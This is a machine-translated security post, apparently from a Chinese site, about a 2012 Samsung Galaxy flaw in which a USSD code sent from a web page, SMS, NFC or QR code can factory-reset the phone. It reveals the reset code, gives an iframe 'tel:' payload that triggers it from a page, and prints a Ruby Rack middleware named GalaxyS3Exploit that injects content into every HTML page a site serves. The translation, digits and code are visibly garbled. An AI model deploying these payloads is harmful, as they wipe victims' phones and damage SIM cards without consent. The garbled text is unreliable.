Line of code let the Samsung galaxy do Factory Reset-vulnerability warning-the black bar safety net

2012-09-28T00:00:00
ID MYHACK58:62201235054
Type myhack58
Reporter 佚名
Modified 2012-09-28T00:00:00

Description

SAMSUNG including the GALAXY S3 and other models of the smart phone there is a serious security vulnerability, a line of USSD code can be formatted the phone and even damage the SIM card!

The current is determined there is a problem of the phone as follows:

> Galaxy S3, Galaxy S2, Galaxy Ace, Galaxy Beam, Galaxy S

Security expert Ravi Borgaonkar at the Ekoparty security conference shows, SAMSUNG's smart phones including the SAMSUNG GALAXY S III, GALAXY S II, GALAXY Beam, GALAXY S Advance and the GALAXY Ace, as long as the user opens via SMS, NFC, proximity sensing, and even a QR code to send a section of the USSD code, you can easily format your smart phone.

ok, said so many, the key in the USSD code is what Le?? The answer is revealed~~

> 2 7 6 73 8 5 5#

That is, make your phone automatically broadcast 2 7 6 73 8 5 5#

Of course you can also write on the pages inside.

|

1

|

<framesrc='tel:2 7 6 73 8 5 5%2 3'/>

---|---

Please refer to the simple Rails code.

2012/09/26 1 7:3 0 Update: Rails code is removed, this way a simple one ! :) Please do not used for illegal purposes.

1

2

3

4

5

6

7

8

9

1 0

1 1

1 2

1 3

1 4

1 5

1 6

1 7

1 8

1 9

2 0

2 1

2 2

2 3

2 4

2 5

2 6

|

moduleRack

classGalaxyS3Exploit

definitialize(app)

@app= app

end

defcall(env)

res =@app. call(env)

ifres[1]['Content-Type'] =~ /text\/html/

res. tapdo|res|

orig = res[2]

res[2] = []. tapdo|body|

orig. eachdo|line|

body << line. sub(/(?=& lt;\/body>)/,"")

end

orig. closeiforig. respond_to? (:close)

res[1]['Content-Length'] = body. join. size. to_sifres[1]['Content-Length']

end

end

else

res

end

end

end

end

---|---

[1] [2] next